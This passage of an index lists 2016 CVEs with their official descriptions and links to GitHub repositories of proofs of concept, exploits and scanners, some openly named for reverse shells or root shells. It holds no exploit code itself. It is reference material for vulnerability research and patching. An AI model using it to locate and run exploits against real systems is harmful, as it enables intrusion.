- [deamwork/MS16-051-poc](https://github.com/deamwork/MS16-051-poc)
### CVE-2016-0199 (2016-06-16)
Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2016-0200 and CVE-2016-3211.
- [LeoonZHANG/CVE-2016-0199](https://github.com/LeoonZHANG/CVE-2016-0199)
### CVE-2016-0451 (2016-01-21)
Unspecified vulnerability in the Oracle GoldenGate component in Oracle GoldenGate 11.2 and 12.1.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2016-0452.
- [rwincey/Oracle-GoldenGate---CVE-2016-0451](https://github.com/rwincey/Oracle-GoldenGate---CVE-2016-0451)
### CVE-2016-0638 (2016-04-21)
Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6, 12.1.2, 12.1.3, and 12.2.1 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to Java Messaging Service.
- [0xn0ne/weblogicScanner](https://github.com/0xn0ne/weblogicScanner)
- [zhzhdoai/Weblogic_Vuln](https://github.com/zhzhdoai/Weblogic_Vuln)
- [BabyTeam1024/CVE-2016-0638](https://github.com/BabyTeam1024/CVE-2016-0638)
### CVE-2016-0701 (2016-02-15)
The DH_check_pub_key function in crypto/dh/dh_check.c in OpenSSL 1.0.2 before 1.0.2f does not ensure that prime numbers are appropriate for Diffie-Hellman (DH) key exchange, which makes it easier for remote attackers to discover a private DH exponent by making multiple handshakes with a peer that chose an inappropriate number, as demonstrated by a number in an X9.42 file.
- [luanjampa/cve-2016-0701](https://github.com/luanjampa/cve-2016-0701)
### CVE-2016-0702 (2016-03-03)
The MOD_EXP_CTIME_COPY_FROM_PREBUF function in crypto/bn/bn_exp.c in OpenSSL 1.0.1 before 1.0.1s and 1.0.2 before 1.0.2g does not properly consider cache-bank access times during modular exponentiation, which makes it easier for local users to discover RSA keys by running a crafted application on the same Intel Sandy Bridge CPU core as a victim and leveraging cache-bank conflicts, aka a "CacheBleed" attack.
- [Trinadh465/OpenSSL-1_0_1g_CVE-2016-0702](https://github.com/Trinadh465/OpenSSL-1_0_1g_CVE-2016-0702)
### CVE-2016-0705 (2016-03-03)
Double free vulnerability in the dsa_priv_decode function in crypto/dsa/dsa_ameth.c in OpenSSL 1.0.1 before 1.0.1s and 1.0.2 before 1.0.2g allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a malformed DSA private key.
- [hshivhare67/OpenSSL_1.0.1g_CVE-2016-0705](https://github.com/hshivhare67/OpenSSL_1.0.1g_CVE-2016-0705)
### CVE-2016-0728 (2016-02-08)
The join_session_keyring function in security/keys/process_keys.c in the Linux kernel before 4.4.1 mishandles object references in a certain error case, which allows local users to gain privileges or cause a denial of service (integer overflow and use-after-free) via crafted keyctl commands.
- [idl3r/cve-2016-0728](https://github.com/idl3r/cve-2016-0728)
- [kennetham/cve_2016_0728](https://github.com/kennetham/cve_2016_0728)
- [nardholio/cve-2016-0728](https://github.com/nardholio/cve-2016-0728)
- [googleweb/CVE-2016-0728](https://github.com/googleweb/CVE-2016-0728)
- [neuschaefer/cve-2016-0728-testbed](https://github.com/neuschaefer/cve-2016-0728-testbed)
- [bittorrent3389/cve-2016-0728](https://github.com/bittorrent3389/cve-2016-0728)
- [sibilleg/exploit_cve-2016-0728](https://github.com/sibilleg/exploit_cve-2016-0728)
- [hal0taso/CVE-2016-0728](https://github.com/hal0taso/CVE-2016-0728)
- [sugarvillela/CVE](https://github.com/sugarvillela/CVE)
- [th30d00r/Linux-Vulnerability-CVE-2016-0728-and-Exploit](https://github.com/th30d00r/Linux-Vulnerability-CVE-2016-0728-and-Exploit)
- [tndud042713/cve](https://github.com/tndud042713/cve)
- [sidrk01/cve-2016-0728](https://github.com/sidrk01/cve-2016-0728)
### CVE-2016-0752 (2016-02-16)
Directory traversal vulnerability in Action View in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 allows remote attackers to read arbitrary files by leveraging an application's unrestricted use of the render method and providing a .. (dot dot) in a pathname.
- [forced-request/rails-rce-cve-2016-0752](https://github.com/forced-request/rails-rce-cve-2016-0752)
- [dachidahu/CVE-2016-0752](https://github.com/dachidahu/CVE-2016-0752)
### CVE-2016-0792 (2016-04-07)
Multiple unspecified API endpoints in Jenkins before 1.650 and LTS before 1.642.2 allow remote authenticated users to execute arbitrary code via serialized data in an XML file, related to XStream and groovy.util.Expando.
- [jpiechowka/jenkins-cve-2016-0792](https://github.com/jpiechowka/jenkins-cve-2016-0792)
- [Aviksaikat/CVE-2016-0792](https://github.com/Aviksaikat/CVE-2016-0792)
### CVE-2016-0793 (2016-04-01)
Incomplete blacklist vulnerability in the servlet filter restriction mechanism in WildFly (formerly JBoss Application Server) before 10.0.0.Final on Windows allows remote attackers to read the sensitive files in the (1) WEB-INF or (2) META-INF directory via a request that contains (a) lowercase or (b) "meaningless" characters.
- [tafamace/CVE-2016-0793](https://github.com/tafamace/CVE-2016-0793)
### CVE-2016-0800 (2016-03-01)
The SSLv2 protocol, as used in OpenSSL before 1.0.1s and 1.0.2 before 1.0.2g and other products, requires a server to send a ServerVerify message before establishing that a client possesses certain plaintext RSA data, which makes it easier for remote attackers to decrypt TLS ciphertext data by leveraging a Bleichenbacher RSA padding oracle, aka a "DROWN" attack.
- [anthophilee/A2SV--SSL-VUL-Scan](https://github.com/anthophilee/A2SV--SSL-VUL-Scan)
### CVE-2016-0801 (2016-02-07)
The Broadcom Wi-Fi driver in the kernel in Android 4.x before 4.4.4, 5.x before 5.1.1 LMY49G, and 6.x before 2016-02-01 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted wireless control message packets, aka internal bug 25662029.
- [abdsec/CVE-2016-0801](https://github.com/abdsec/CVE-2016-0801)
- [zsaurus/CVE-2016-0801-test](https://github.com/zsaurus/CVE-2016-0801-test)
### CVE-2016-0805 (2016-02-07)
The performance event manager for Qualcomm ARM processors in Android 4.x before 4.4.4, 5.x before 5.1.1 LMY49G, and 6.x before 2016-02-01 allows attackers to gain privileges via a crafted application, aka internal bug 25773204.
- [hulovebin/cve-2016-0805](https://github.com/hulovebin/cve-2016-0805)
### CVE-2016-0846 (2016-04-18)
libs/binder/IMemory.cpp in the IMemory Native Interface in Android 4.x before 4.4.4, 5.0.x before 5.0.2, 5.1.x before 5.1.1, and 6.x before 2016-04-01 does not properly consider the heap size, which allows attackers to gain privileges via a crafted application, as demonstrated by obtaining Signature or SignatureOrSystem access, aka internal bug 26877992.
- [secmob/CVE-2016-0846](https://github.com/secmob/CVE-2016-0846)
- [b0b0505/CVE-2016-0846-PoC](https://github.com/b0b0505/CVE-2016-0846-PoC)
### CVE-2016-0974 (2016-02-10)
Use-after-free vulnerability in Adobe Flash Player before 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows and OS X and before 11.2.202.569 on Linux, Adobe AIR before 20.0.0.260, Adobe AIR SDK before 20.0.0.260, and Adobe AIR SDK & Compiler before 20.0.0.260 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-0973, CVE-2016-0975, CVE-2016-0982, CVE-2016-0983, and CVE-2016-0984.
- [Fullmetal5/FlashHax](https://github.com/Fullmetal5/FlashHax)
### CVE-2016-1240 (2016-10-03)
The Tomcat init script in the tomcat7 package before 7.0.56-3+deb8u4 and tomcat8 package before 8.0.14-1+deb8u3 on Debian jessie and the tomcat6 and libtomcat6-java packages before 6.0.35-1ubuntu3.8 on Ubuntu 12.04 LTS, the tomcat7 and libtomcat7-java packages before 7.0.52-1ubuntu0.7 on Ubuntu 14.04 LTS, and tomcat8 and libtomcat8-java packages before 8.0.32-1ubuntu1.2 on Ubuntu 16.04 LTS allows local users with access to the tomcat account to gain root privileges via a symlink attack on the Catalina log file, as demonstrated by /var/log/tomcat7/catalina.out.
- [Naramsim/Offensive](https://github.com/Naramsim/Offensive)
- [mhe18/CVE_Project](https://github.com/mhe18/CVE_Project)
### CVE-2016-1287 (2016-02-11)
Buffer overflow in the IKEv1 and IKEv2 implementations in Cisco ASA Software before 8.4(7.30), 8.7 before 8.7(1.18), 9.0 before 9.0(4.38), 9.1 before 9.1(7), 9.2 before 9.2(4.5), 9.3 before 9.3(3.7), 9.4 before 9.4(2.4), and 9.5 before 9.5(2.2) on ASA 5500 devices, ASA 5500-X devices, ASA Services Module for Cisco Catalyst 6500 and Cisco 7600 devices, ASA 1000V devices, Adaptive Security Virtual Appliance (aka ASAv), Firepower 9300 ASA Security Module, and ISA 3000 devices allows remote attackers to execute arbitrary code or cause a denial of service (device reload) via crafted UDP packets, aka Bug IDs CSCux29978 and CSCux42019.
- [jgajek/killasa](https://github.com/jgajek/killasa)
- [NetSPI/asa_tools](https://github.com/NetSPI/asa_tools)
### CVE-2016-1494 (2016-01-13)
The verify function in the RSA package for Python (Python-RSA) before 3.3 allows attackers to spoof signatures with a small public exponent via crafted signature padding, aka a BERserk attack.
- [matthiasbe/secuimag3a](https://github.com/matthiasbe/secuimag3a)
### CVE-2016-1531 (2016-04-07)
Exim before 4.86.2, when installed setuid root, allows local users to gain privileges via the perl_startup argument.
- [h3xcr4ck3r/CVE-2016-1531](https://github.com/h3xcr4ck3r/CVE-2016-1531)
### CVE-2016-1542 (2016-06-13)
The RPC API in RSCD agent in BMC BladeLogic Server Automation (BSA) 8.2.x, 8.3.x, 8.5.x, 8.6.x, and 8.7.x on Linux and UNIX allows remote attackers to bypass authorization and enumerate users by sending an action packet to xmlrpc after an authorization failure.
- [patriknordlen/bladelogic_bmc-cve-2016-1542](https://github.com/patriknordlen/bladelogic_bmc-cve-2016-1542)
- [bao7uo/bmc_bladelogic](https://github.com/bao7uo/bmc_bladelogic)
### CVE-2016-1555 (2017-04-21)
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute arbitrary commands.
- [ide0x90/cve-2016-1555](https://github.com/ide0x90/cve-2016-1555)
### CVE-2016-1734 (2016-03-24)
AppleUSBNetworking in Apple iOS before 9.3 and OS X before 10.11.4 allows physically proximate attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted USB device.
- [Manouchehri/CVE-2016-1734](https://github.com/Manouchehri/CVE-2016-1734)
### CVE-2016-1757 (2016-03-24)
Race condition in the kernel in Apple iOS before 9.3 and OS X before 10.11.4 allows attackers to execute arbitrary code in a privileged context via a crafted app.
- [gdbinit/mach_race](https://github.com/gdbinit/mach_race)
### CVE-2016-1764 (2016-03-24)
The Content Security Policy (CSP) implementation in Messages in Apple OS X before 10.11.4 allows remote attackers to obtain sensitive information via a javascript: URL.
- [moloch--/cve-2016-1764](https://github.com/moloch--/cve-2016-1764)
### CVE-2016-1825 (2016-05-20)
IOHIDFamily in Apple OS X before 10.11.5 allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app.
- [bazad/physmem](https://github.com/bazad/physmem)
### CVE-2016-1827 (2016-05-20)
The kernel in Apple iOS before 9.3.2, OS X before 10.11.5, tvOS before 9.2.1, and watchOS before 2.2.1 allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app, a different vulnerability than CVE-2016-1828, CVE-2016-1829, and CVE-2016-1830.
- [bazad/flow_divert-heap-overflow](https://github.com/bazad/flow_divert-heap-overflow)
- [superMan7912002/bazad3](https://github.com/superMan7912002/bazad3)
### CVE-2016-1828 (2016-05-20)
The kernel in Apple iOS before 9.3.2, OS X before 10.11.5, tvOS before 9.2.1, and watchOS before 2.2.1 allows attackers to execute arbitrary code in a privileged context or cause a denial of service (memory corruption) via a crafted app, a different vulnerability than CVE-2016-1827, CVE-2016-1829, and CVE-2016-1830.
- [bazad/rootsh](https://github.com/bazad/rootsh)
- [berritus163t/bazad5](https://github.com/berritus163t/bazad5)
- [SideGreenHand100/bazad5](https://github.com/SideGreenHand100/bazad5)
- [zqlblingzs/bazad5](https://github.com/zqlblingzs/bazad5)
### CVE-2016-2004 (2016-04-21)
HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-2623.
- [marcocarolasec/CVE-2016-2004-Exploit](https://github.com/marcocarolasec/CVE-2016-2004-Exploit)
### CVE-2016-2067 (2016-07-11)
drivers/gpu/msm/kgsl.c in the MSM graphics driver (aka GPU driver) for the Linux kernel 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, mishandles the KGSL_MEMFLAGS_GPUREADONLY flag, which allows attackers to gain privileges by leveraging accidental read-write mappings, aka Qualcomm internal bug CR988993.
- [hhj4ck/CVE-2016-2067](https://github.com/hhj4ck/CVE-2016-2067)
### CVE-2016-2098 (2016-04-07)
Action Pack in Ruby on Rails before 3.2.22.2, 4.x before 4.1.14.2, and 4.2.x before 4.2.5.2 allows remote attackers to execute arbitrary Ruby code by leveraging an application's unrestricted use of the render method.
- [hderms/dh-CVE_2016_2098](https://github.com/hderms/dh-CVE_2016_2098)
- [CyberDefenseInstitute/PoC_CVE-2016-2098_Rails42](https://github.com/CyberDefenseInstitute/PoC_CVE-2016-2098_Rails42)
- [Alejandro-MartinG/rails-PoC-CVE-2016-2098](https://github.com/Alejandro-MartinG/rails-PoC-CVE-2016-2098)
- [0x00-0x00/CVE-2016-2098](https://github.com/0x00-0x00/CVE-2016-2098)
- [its-arun/CVE-2016-2098](https://github.com/its-arun/CVE-2016-2098)
- [3rg1s/CVE-2016-2098](https://github.com/3rg1s/CVE-2016-2098)
- [DanielHemmati/CVE-2016-2098-my-first-exploit](https://github.com/DanielHemmati/CVE-2016-2098-my-first-exploit)
- [Debalinax64/CVE-2016-2098](https://github.com/Debalinax64/CVE-2016-2098)
- [j4k0m/CVE-2016-2098](https://github.com/j4k0m/CVE-2016-2098)
- [Shakun8/CVE-2016-2098](https://github.com/Shakun8/CVE-2016-2098)
- [JoseLRC97/Ruby-on-Rails-ActionPack-Inline-ERB-Remote-Code-Execution](https://github.com/JoseLRC97/Ruby-on-Rails-ActionPack-Inline-ERB-Remote-Code-Execution)
### CVE-2016-2107 (2016-05-05)
The AES-NI implementation in OpenSSL before 1.0.1t and 1.0.2 before 1.0.2h does not consider memory allocation during a certain padding check, which allows remote attackers to obtain sensitive cleartext information via a padding-oracle attack against an AES CBC session. NOTE: this vulnerability exists because of an incorrect fix for CVE-2013-0169.
- [FiloSottile/CVE-2016-2107](https://github.com/FiloSottile/CVE-2016-2107)
- [tmiklas/docker-cve-2016-2107](https://github.com/tmiklas/docker-cve-2016-2107)
### CVE-2016-2118 (2016-04-12)
The MS-SAMR and MS-LSAD protocol implementations in Samba 3.x and 4.x before 4.2.11, 4.3.x before 4.3.8, and 4.4.x before 4.4.2 mishandle DCERPC connections, which allows man-in-the-middle attackers to perform protocol-downgrade attacks and impersonate users by modifying the client-server data stream, aka "BADLOCK."
- [nickanderson/cfengine-CVE-2016-2118](https://github.com/nickanderson/cfengine-CVE-2016-2118)
### CVE-2016-2173 (2017-04-21)
org.springframework.core.serializer.DefaultDeserializer in Spring AMQP before 1.5.5 allows remote attackers to execute arbitrary code.
- [HaToan/CVE-2016-2173](https://github.com/HaToan/CVE-2016-2173)
### CVE-2016-2233 (2017-01-18)
Stack-based buffer overflow in the inbound_cap_ls function in common/inbound.c in HexChat 2.10.2 allows remote IRC servers to cause a denial of service (crash) via a large number of options in a CAP LS message.
- [fath0218/CVE-2016-2233](https://github.com/fath0218/CVE-2016-2233)
### CVE-2016-2334 (2016-12-13)
Heap-based buffer overflow in the NArchive::NHfs::CHandler::ExtractZlibFile method in 7zip before 16.00 and p7zip allows remote attackers to execute arbitrary code via a crafted HFS+ image.
- [icewall/CVE-2016-2334](https://github.com/icewall/CVE-2016-2334)
### CVE-2016-2338 (2020-02-14)
An exploitable heap overflow vulnerability exists in the Psych::Emitter start_document function of Ruby. In Psych::Emitter start_document function heap buffer "head" allocation is made based on tags array length. Specially constructed object passed as element of tags array can increase this array size after mentioned allocation and cause heap overflow.
- [SpiralBL0CK/CVE-2016-2338-nday](https://github.com/SpiralBL0CK/CVE-2016-2338-nday)
### CVE-2016-2386 (2016-02-16)
SQL injection vulnerability in the UDDI server in SAP NetWeaver J2EE Engine 7.40 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, aka SAP Security Note 2101079.
- [murataydemir/CVE-2016-2386](https://github.com/murataydemir/CVE-2016-2386)
### CVE-2016-2402 (2017-01-30)
OkHttp before 2.7.4 and 3.x before 3.1.2 allows man-in-the-middle attackers to bypass certificate pinning by sending a certificate chain with a certificate from a non-pinned trusted CA and the pinned certificate.
- [ikoz/cert-pinning-flaw-poc](https://github.com/ikoz/cert-pinning-flaw-poc)
- [ikoz/certPinningVulnerableOkHttp](https://github.com/ikoz/certPinningVulnerableOkHttp)
### CVE-2016-2431 (2016-05-09)
The Qualcomm TrustZone component in Android before 2016-05-01 on Nexus 5, Nexus 6, Nexus 7 (2013), and Android One devices allows attackers to gain privileges via a crafted application, aka internal bug 24968809.
- [laginimaineb/cve-2016-2431](https://github.com/laginimaineb/cve-2016-2431)
- [laginimaineb/ExtractKeyMaster](https://github.com/laginimaineb/ExtractKeyMaster)
### CVE-2016-2434 (2016-05-09)
The NVIDIA video driver in Android before 2016-05-01 on Nexus 9 devices allows attackers to gain privileges via a crafted application, aka internal bug 27251090.
- [jianqiangzhao/CVE-2016-2434](https://github.com/jianqiangzhao/CVE-2016-2434)
### CVE-2016-2468 (2016-06-13)
The Qualcomm GPU driver in Android before 2016-06-01 on Nexus 5, 5X, 6, 6P, and 7 devices allows attackers to gain privileges via a crafted application, aka internal bug 27475454.
- [gitcollect/CVE-2016-2468](https://github.com/gitcollect/CVE-2016-2468)
### CVE-2016-2555 (2017-04-13)
SQL injection vulnerability in include/lib/mysql_connect.inc.php in ATutor 2.2.1 allows remote attackers to execute arbitrary SQL commands via the searchFriends function to friends.inc.php.
- [shadofren/CVE-2016-2555](https://github.com/shadofren/CVE-2016-2555)
- [maximilianmarx/atutor-blind-sqli](https://github.com/maximilianmarx/atutor-blind-sqli)
### CVE-2016-2569 (2016-02-27)
Squid 3.x before 3.5.15 and 4.x before 4.0.7 does not properly append data to String objects, which allows remote servers to cause a denial of service (assertion failure and daemon exit) via a long string, as demonstrated by a crafted HTTP Vary header.
- [amit-raut/CVE-2016-2569](https://github.com/amit-raut/CVE-2016-2569)
### CVE-2016-2776 (2016-09-28)
buffer.c in named in ISC BIND 9 before 9.9.9-P3, 9.10.x before 9.10.4-P3, and 9.11.x before 9.11.0rc3 does not properly construct responses, which allows remote attackers to cause a denial of service (assertion failure and daemon exit) via a crafted query.
- [KosukeShimofuji/CVE-2016-2776](https://github.com/KosukeShimofuji/CVE-2016-2776)
- [infobyte/CVE-2016-2776](https://github.com/infobyte/CVE-2016-2776)
### CVE-2016-2783 (2017-01-23)
Avaya Fabric Connect Virtual Services Platform (VSP) Operating System Software (VOSS) before 4.2.3.0 and 5.x before 5.0.1.0 does not properly handle VLAN and I-SIS indexes, which allows remote attackers to obtain unauthorized access via crafted Ethernet frames.
- [iknowjason/spb](https://github.com/iknowjason/spb)
### CVE-2016-3088 (2016-06-01)
The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.
- [Ma1Dong/ActiveMQ_putshell-CVE-2016-3088](https://github.com/Ma1Dong/ActiveMQ_putshell-CVE-2016-3088)
- [pudiding/CVE-2016-3088](https://github.com/pudiding/CVE-2016-3088)
- [cyberaguiar/CVE-2016-3088](https://github.com/cyberaguiar/CVE-2016-3088)
- [vonderchild/CVE-2016-3088](https://github.com/vonderchild/CVE-2016-3088)
- [cl4ym0re/CVE-2016-3088](https://github.com/cl4ym0re/CVE-2016-3088)
- [YutuSec/ActiveMQ_Crack](https://github.com/YutuSec/ActiveMQ_Crack)
### CVE-2016-3113 (2017-08-07)
Cross-site scripting (XSS) vulnerability in ovirt-engine allows remote attackers to inject arbitrary web script or HTML.
- [0xEmanuel/CVE-2016-3113](https://github.com/0xEmanuel/CVE-2016-3113)
### CVE-2016-3116 (2016-03-22)
CRLF injection vulnerability in Dropbear SSH before 2016.72 allows remote authenticated users to bypass intended shell-command restrictions via crafted X11 forwarding data.
- [mxypoo/CVE-2016-3116-DropbearSSH](https://github.com/mxypoo/CVE-2016-3116-DropbearSSH)
### CVE-2016-3141 (2016-03-31)
Use-after-free vulnerability in wddx.c in the WDDX extension in PHP before 5.5.33 and 5.6.x before 5.6.19 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly have unspecified other impact by triggering a wddx_deserialize call on XML data containing a crafted var element.
- [peternguyen93/CVE-2016-3141](https://github.com/peternguyen93/CVE-2016-3141)
### CVE-2016-3238 (2016-07-13)
The Print Spooler service in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 allows man-in-the-middle attackers to execute arbitrary code by providing a crafted print driver during printer installation, aka "Windows Print Spooler Remote Code Execution Vulnerability."
- [pyiesone/CVE-2016-3238-PoC](https://github.com/pyiesone/CVE-2016-3238-PoC)
### CVE-2016-3308 (2016-08-09)
The kernel-mode drivers in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607 allow local users to gain privileges via a crafted application, aka "Win32k Elevation of Privilege Vulnerability," a different vulnerability than CVE-2016-3309, CVE-2016-3310, and CVE-2016-3311.
- [55-AA/CVE-2016-3308](https://github.com/55-AA/CVE-2016-3308)
### CVE-2016-3309 (2016-08-09)
The kernel-mode drivers in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607 allow local users to gain privileges via a crafted application, aka "Win32k Elevation of Privilege Vulnerability," a different vulnerability than CVE-2016-3308, CVE-2016-3310, and CVE-2016-3311.
- [siberas/CVE-2016-3309_Reloaded](https://github.com/siberas/CVE-2016-3309_Reloaded)
### CVE-2016-3510 (2016-07-21)
Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to WLS Core Components, a different vulnerability than CVE-2016-3586.
- [BabyTeam1024/CVE-2016-3510](https://github.com/BabyTeam1024/CVE-2016-3510)
### CVE-2016-3714 (2016-05-05)
The (1) EPHEMERAL, (2) HTTPS, (3) MVG, (4) MSL, (5) TEXT, (6) SHOW, (7) WIN, and (8) PLT coders in ImageMagick before 6.9.3-10 and 7.x before 7.0.1-1 allow remote attackers to execute arbitrary code via shell metacharacters in a crafted image, aka "ImageTragick."
- [jackdpeterson/imagick_secure_puppet](https://github.com/jackdpeterson/imagick_secure_puppet)
- [tommiionfire/CVE-2016-3714](https://github.com/tommiionfire/CVE-2016-3714)
- [chusiang/CVE-2016-3714.ansible.role](https://github.com/chusiang/CVE-2016-3714.ansible.role)
- [jpeanut/ImageTragick-CVE-2016-3714-RShell](https://github.com/jpeanut/ImageTragick-CVE-2016-3714-RShell)
- [Hood3dRob1n/CVE-2016-3714](https://github.com/Hood3dRob1n/CVE-2016-3714)
- [JoshMorrison99/CVE-2016-3714](https://github.com/JoshMorrison99/CVE-2016-3714)
### CVE-2016-3749 (2016-07-11)
server/LockSettingsService.java in LockSettingsService in Android 6.x before 2016-07-01 allows attackers to modify the screen-lock password or pattern via a crafted application, aka internal bug 28163930.
- [nirdev/CVE-2016-3749-PoC](https://github.com/nirdev/CVE-2016-3749-PoC)
### CVE-2016-3861 (2016-09-11)
LibUtils in Android 4.x before 4.4.4, 5.0.x before 5.0.2, 5.1.x before 5.1.1, 6.x before 2016-09-01, and 7.0 before 2016-09-01 mishandles conversions between Unicode character encodings with different encoding widths, which allows remote attackers to execute arbitrary code or cause a denial of service (heap-based buffer overflow) via a crafted file, aka internal bug 29250543.
- [zxkevn/CVE-2016-3861](https://github.com/zxkevn/CVE-2016-3861)
### CVE-2016-3955 (2016-07-03)
The usbip_recv_xbuff function in drivers/usb/usbip/usbip_common.c in the Linux kernel before 4.5.3 allows remote attackers to cause a denial of service (out-of-bounds write) or possibly have unspecified other impact via a crafted length value in a USB/IP packet.
- [pqsec/uboatdemo](https://github.com/pqsec/uboatdemo)
### CVE-2016-3957 (2018-02-06)
The secure_load function in gluon/utils.py in web2py before 2.14.2 uses pickle.loads to deserialize session information stored in cookies, which might allow remote attackers to execute arbitrary code by leveraging knowledge of encryption_key.
- [sj/web2py-e94946d-CVE-2016-3957](https://github.com/sj/web2py-e94946d-CVE-2016-3957)
### CVE-2016-3959 (2016-05-23)
The Verify function in crypto/dsa/dsa.go in Go before 1.5.4 and 1.6.x before 1.6.1 does not properly check parameters passed to the big integer library, which might allow remote attackers to cause a denial of service (infinite loop) via a crafted public key to a program that uses HTTPS client certificates or SSH server libraries.
- [alexmullins/dsa](https://github.com/alexmullins/dsa)
### CVE-2016-3962 (2016-07-03)
Stack-based buffer overflow in the NTP time-server interface on Meinberg IMS-LANTIME M3000, IMS-LANTIME M1000, IMS-LANTIME M500, LANTIME M900, LANTIME M600, LANTIME M400, LANTIME M300, LANTIME M200, LANTIME M100, SyncFire 1100, and LCES devices with firmware before 6.20.004 allows remote attackers to obtain sensitive information, modify data, or cause a denial of service via a crafted parameter in a POST request.
- [securifera/CVE-2016-3962-Exploit](https://github.com/securifera/CVE-2016-3962-Exploit)
### CVE-2016-4004 (2016-04-12)
Directory traversal vulnerability in Dell OpenManage Server Administrator (OMSA) 8.2 allows remote authenticated administrators to read arbitrary files via a ..\ (dot dot backslash) in the file parameter to ViewFile.
- [und3sc0n0c1d0/AFR-in-OMSA](https://github.com/und3sc0n0c1d0/AFR-in-OMSA)
### CVE-2016-4010 (2017-01-23)
Magento CE and EE before 2.0.6 allows remote attackers to conduct PHP objection injection attacks and execute arbitrary PHP code via crafted serialized shopping cart data.
- [brianwrf/Magento-CVE-2016-4010](https://github.com/brianwrf/Magento-CVE-2016-4010)
- [shadofren/CVE-2016-4010](https://github.com/shadofren/CVE-2016-4010)
### CVE-2016-4014 (2016-04-14)
XML external entity (XXE) vulnerability in the UDDI component in SAP NetWeaver JAVA AS 7.4 allows remote attackers to cause a denial of service (system hang) via a crafted DTD in an XML request to uddi/api/replication, aka SAP Security Note 2254389.
- [murataydemir/CVE-2016-4014](https://github.com/murataydemir/CVE-2016-4014)
### CVE-2016-4117 (2016-05-11)
Adobe Flash Player 21.0.0.226 and earlier allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in May 2016.
- [amit-raut/CVE-2016-4117-Report](https://github.com/amit-raut/CVE-2016-4117-Report)
- [hybridious/CVE-2016-4117](https://github.com/hybridious/CVE-2016-4117)
### CVE-2016-4437 (2016-06-07)
Apache Shiro before 1.2.5, when a cipher key has not been configured for the "remember me" feature, allows remote attackers to execute arbitrary code or bypass intended access restrictions via an unspecified request parameter.
- [bkfish/Awesome_shiro](https://github.com/bkfish/Awesome_shiro)
- [m3terpreter/CVE-2016-4437](https://github.com/m3terpreter/CVE-2016-4437)
- [4nth0ny1130/shisoserial](https://github.com/4nth0ny1130/shisoserial)
- [pizza-power/CVE-2016-4437](https://github.com/pizza-power/CVE-2016-4437)
- [xk-mt/CVE-2016-4437](https://github.com/xk-mt/CVE-2016-4437)
### CVE-2016-4438 (2016-07-04)
The REST plugin in Apache Struts 2 2.3.19 through 2.3.28.1 allows remote attackers to execute arbitrary code via a crafted expression.
- [jason3e7/CVE-2016-4438](https://github.com/jason3e7/CVE-2016-4438)
- [tafamace/CVE-2016-4438](https://github.com/tafamace/CVE-2016-4438)
### CVE-2016-4463 (2016-07-08)
Stack-based buffer overflow in Apache Xerces-C++ before 3.1.4 allows context-dependent attackers to cause a denial of service via a deeply nested DTD.
- [arntsonl/CVE-2016-4463](https://github.com/arntsonl/CVE-2016-4463)
### CVE-2016-4468 (2017-04-11)
SQL injection vulnerability in Pivotal Cloud Foundry (PCF) before 238; UAA 2.x before 2.7.4.4, 3.x before 3.3.0.2, and 3.4.x before 3.4.1; UAA BOSH before 11.2 and 12.x before 12.2; Elastic Runtime before 1.6.29 and 1.7.x before 1.7.7; and Ops Manager 1.7.x before 1.7.8 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors.
- [shanika04/cloudfoundry_uaa](https://github.com/shanika04/cloudfoundry_uaa)
### CVE-2016-4622 (2016-07-22)
WebKit in Apple iOS before 9.3.3, Safari before 9.1.2, and tvOS before 9.2.2 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, a different vulnerability than CVE-2016-4589, CVE-2016-4623, and CVE-2016-4624.
- [saelo/jscpwn](https://github.com/saelo/jscpwn)
- [hdbreaker/WebKit-CVE-2016-4622](https://github.com/hdbreaker/WebKit-CVE-2016-4622)
### CVE-2016-4631 (2016-07-22)
ImageIO in Apple iOS before 9.3.3, OS X before 10.11.6, tvOS before 9.2.2, and watchOS before 2.2.2 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted TIFF file.
